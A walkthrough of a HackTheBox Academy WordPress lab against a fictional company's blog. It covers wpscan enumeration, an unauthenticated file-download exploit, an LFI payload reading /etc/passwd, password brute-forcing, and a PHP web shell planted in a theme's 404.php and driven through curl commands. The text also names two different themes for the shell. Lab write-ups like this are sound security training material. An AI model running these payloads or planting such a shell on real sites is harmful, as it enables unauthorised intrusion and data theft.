HTB Academy: Hacking WordPress Module
Penetration Test Scenario
You have been contracted to perform an external penetration test against the company INLANEFREIGHT that is hosting one of their main public-facing websites on WordPress.
Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.
Questions
- Identify the WordPress version number.
- Identify the WordPress theme in use.
- Submit the contents of the flag file in the directory with directory listing enabled.
- Identify the only non-admin WordPress user. (Format:
<first-name> <last-name>) - Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
- What is the version number of the plugin vulnerable to an LFI?
- Use the LFI to identify a system user whose name starts with the letter “f”.
- Obtain a shell on the system and submit the contents of the flag in the
/home/erikadirectory.
Answers
For identifying the WordPress version number and theme, use one of these tools:
- Wappalyzer Extension
- View Page Source or DevTools
- nmap scan
wpscan —url http://<target_ip> —enumerate p
For receiving results, add target IP to hosts:
1
sudo nano /etc/hosts
Add: <target_ip> blog.inlanefreight.local
Refresh your browser. Now you can find the WordPress version number and theme with Wappalyzer, View Page Source/DevTools, or use wpscan.
- WordPress version number: 5.1.6
- WordPress theme in use: Twenty Nineteen
In our wpscan, we can find a link:
http://blog.inlanefreight.local/wp-content/uploads/
You can open this link in the browser or use the terminal:
1
curl http://blog.inlanefreight.local/wp-content/uploads/upload_flag.txt | html2text
- Flag: HTB{d1sabl3_……………..!}
For finding users:
1
wpscan --url http://blog……/ --enumerate u
- Non-admin user: Cha** Wig**
In our wpscan, we can find vulnerable plugins and search about them on Google.
One of the plugins:
- WordPress Plugin: Email Subscribers & Newsletters 4.2.2
- CVE: CVE-2019-19985
Exploit Details
- Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 — Unauthenticated File Download
- Google Dork: “Stable tag” inurl:wp-content/plugins/email-subscribers/readme.txt
- Date: 2020–07–20
- Exploit Author: KBA@SOGETI_ESEC
- Vendor Homepage: Email Subscribers
- Software Link: Plugin Archive
- Version: <= 4.2.2
- Tested on: Email Subscribers & Newsletters 4.2.2
- CVE: CVE-2019–19985
Example Command:
1
curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
- Flag from vulnerable plugin: HTB{unauTH_……..!}
From our wpscan, we can search the exploit database for:
- Vulnerable Plugin: Site Editor
- CVE ID: CVE-2018-7422
- Product: Site Editor WordPress Plugin — Site Editor
- Vendor: Site Editor
- Tested version: 1.1.1
- CVE ID: CVE-2018–7422
Proof of Concept
1
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
- Version number of the plugin vulnerable to an LFI: 1.1.1
Use Proof of Concept:
1
http://<$TARGET>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
- System user: frank.mclane
Obtain a shell on the system and submit the contents of the flag in the /home/erika directory:
1
wpscan --url http://blog.inlanefreight.local/ -U erika --passwords /usr/share/wordlists/rockyou.txt
Login with: erika:010203
Go to the theme editor. Select the Twenty Sixteen Theme. Add to the 404.php page:
1
system ($_GET['cmd']);
Save and check how it works:
1
2
3
4
5
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=id'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=pwd'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=ls+/home/erika'
curl -X GET 'http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=cat+/home/erika/dxxxxxxx603c_flag.txt'
-
Final Flag: HTB{w0rdPr355_………7}
